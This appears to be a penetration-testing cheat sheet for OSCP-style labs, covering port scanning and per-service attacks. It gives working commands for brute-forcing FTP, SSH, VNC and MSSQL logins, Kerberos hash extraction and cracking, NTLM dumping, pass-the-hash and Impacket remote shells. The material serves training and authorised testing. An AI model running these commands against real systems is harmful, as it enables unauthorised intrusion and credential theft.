Port and Service Scanning

This page provides a comprehensive guide for port scanning and service enumeration, including practical commands and tips for various tools and protocols. Use these techniques to discover open ports, identify services, and perform further enumeration or attacks during penetration testing.

General Port Scanning Tools

AutoRecon

• AutoRecon GitHub
• Automated network reconnaissance tool for OSCP-style labs.

sudo ~/.local/bin/autorecon -o ~/oscp 10.11.1.1

sudo chown -R kali:kali . ; find . -type d -exec touch {}/.gitkeep \;

masscan

• masscan GitHub
• Extremely fast port scanner.

sudo masscan -p1-65535 10.11.1.1/32 --rate=1000 -e tun0 | tee masscan.txt

nmap

• The de facto standard for port scanning and service enumeration.

nmap -Pn -sV -sC -p<port> 10.11.1.1 | tee nmap.txt

OneTwoPunch

• OneTwoPunch GitHub
• Combines masscan and nmap for efficient scanning.

echo "10.11.1.1" > target.txt
sudo bash ~/tool/onetwopunch/onetwopunch.sh -t target.txt -p tcp -i tun0 | tee otp-tcp.txt
sudo bash ~/tool/onetwopunch/onetwopunch.sh -t target.txt -p udp -i tun0 | tee otp-udp.txt

Use -i eth0 to specify a different interface.

Common Ports and Service Enumeration

For a list of common ports, see PacketLife Common Ports PDF.

Below are practical tips and commands for enumerating and attacking common services:

21/tcp - FTP

• Anonymous login: anonymous / anonymous
• File operations: ls, cd, get, put

Default Password Brute Force:

hydra -C /usr/share/seclists/Passwords/Default-Credentials/ftp-betterdefaultpasslist.txt 10.11.1.1 ftp

Nmap Scripts:

nmap --script 'ftp-*' -p 21 10.11.1.1

Password Brute Force:

hydra -t 1 -l username -P /usr/share/john/password.lst -vV 10.11.1.1 ftp
medusa -h 10.11.1.1 -u username -P /usr/share/john/password.lst -t 4 -M ftp

22/tcp - SSH

• Connect: ssh username@10.11.1.1
• Use -i ~/.ssh/id_ed25519 for key file, -p 2222 for custom port

User Enumeration (OpenSSH <= 7.7):

pyenv shell 2.7.18 ; pip install -U paramiko
python /usr/share/exploitdb/exploits/linux/remote/45939.py 10.11.1.1 username

Default Password Brute Force:

hydra -C /usr/share/seclists/Passwords/Default-Credentials/ssh-betterdefaultpasslist.txt 10.11.1.1 ssh

Known Key Brute Force:

crowbar -b sshkey -s 10.11.1.1/32 -u username -k ~/tool/ssh-badkeys/authorized

Password Brute Force:

hydra -l username -P /usr/share/john/password.lst -t 4 10.11.1.1 ssh
medusa -h 10.11.1.1 -u username -P /usr/share/john/password.lst -M ssh
ncrack -p 22 --user username -P /usr/share/john/password.lst 10.11.1.1

Username & Password Brute Force:

hydra -e nsr -L /usr/share/metasploit-framework/data/wordlists/http_default_pass.txt -t 4 10.11.1.1 ssh
medusa -h 10.11.1.1 -U user.txt -P /usr/share/john/password.lst -M ssh

80/tcp - HTTP

• Use tools like nikto, gobuster, and check robots.txt for hidden paths.

Directory Brute Force:

gobuster dir -w /usr/share/dirb/wordlists/big.txt -s '200,204,301,302,307,403,500' -e -u http://10.11.1.1/
gobuster dir -w /usr/share/dirb/wordlists/big.txt -s '200,204,301,302,307,403,500' -e -u http://10.11.1.1/internal/

Use -k to ignore invalid certificate errors.

88/tcp - Kerberos

• User enumeration and hash extraction using kerbrute and Impacket tools.

User Enumeration:

sudo nano /etc/hosts
10.11.1.1 domain.local domain.local
./kerbrute_linux_amd64 userenum -d domain.local --dc domain.local /usr/share/seclists/Usernames/Names/names.txt

Get Password Hashes:

python GetNPUsers.py domain.local/ -no-pass -usersfile user.txt
hashcat -a 0 -m 18200 hash.txt /usr/share/john/password.lst --force

Dump NTLM Hashes:

python3 secretsdump.py -dc-ip domain.local admin:password@domain.local

Pass The Hash (NTLM Hash & 5985/tcp):

evil-winrm -u Administrator -H 0e0*** -i domain.local

139/445/tcp - SMB

• File sharing, enumeration, and exploitation using smbclient, Impacket, and Metasploit.

List Shares:

smbclient -L //10.11.1.1/
smbclient -L //10.11.1.1/www
smbclient -L //10.11.1.1/www -U 'admin'

Password Brute Force:

python3 smbrute.py -h 10.11.1.1 -u root -P /usr/share/metasploit-framework/data/wordlists/http_default_pass.txt

Reverse Shell:

• Impacket RCE Guide

python psexec.py "user:pass"@10.11.1.1
python psexec.py -hashes aad***:0e0*** "user"@10.11.1.1
python dcomexec.py "user:pass"@10.11.1.1
python dcomexec.py -hashes aad***:0e0*** "user"@10.11.1.1
python wmiexec.py "user:pass"@10.11.1.1
python wmiexec.py -hashes aad***:0e0*** "user"@10.11.1.1

Version Detection:

bash ~/tool/smbver/smbver.sh 10.11.1.115 139
msf6 > use auxiliary/scanner/smb/smb_version

1433/tcp - MSSQL

• Microsoft SQL Server enumeration and exploitation.

Connect:

sqsh -S 10.11.1.1 -U sa
python mssqlclient.py -p 1433 sa:pass@10.11.1.1

Brute Force:

hydra -l sa -P /usr/share/wordlists/rockyou.txt 10.11.1.111 mssql
medusa -h 10.11.1.111 mssql -u sa -P /usr/share/wordlists/rockyou.txt -M mssql
nmap -Pn -n -sS --script 'ms-sql-xp-cmdshell.nse' 10.11.1.1 -p 1433 --script-args mssql.username=sa,mssql.password=password,ms-sql-xp-cmdshell.cmd="net user",mssql.instance-all
nmap -p 445 --script ms-sql-brute --script-args mssql.instance-all,userdb="/usr/share/seclists/Usernames/top-usernames-shortlist.txt",passdb="/usr/share/seclists/Passwords/darkweb2017-top100.txt" 10.11.1.1

RCE:

• Python MSSQL Shell
• Metasploit Unleashed - MSSQL Payloads
• Hacking Articles - MSSQL

3306/tcp - MySQL

• MySQL Database

Connect:

mysql -h10.11.1.1 -P3306 -uroot -p

3389/tcp - RDP

• Remote Desktop Protocol

Connect:

xfreerdp /f /u:user /p:pass /v:10.11.1.1

5900/tcp - VNC

• VNC remote desktop

Password Brute Force:

hydra -s 5900 -P /usr/share/john/password.lst -t 16 10.11.1.1 vnc

5985/tcp - WinRM

• Windows Remote Management

Connect:

evil-winrm -u user -p pass -i 10.11.1.1
evil-winrm -u Administrator -H 0e0*** -i domain.local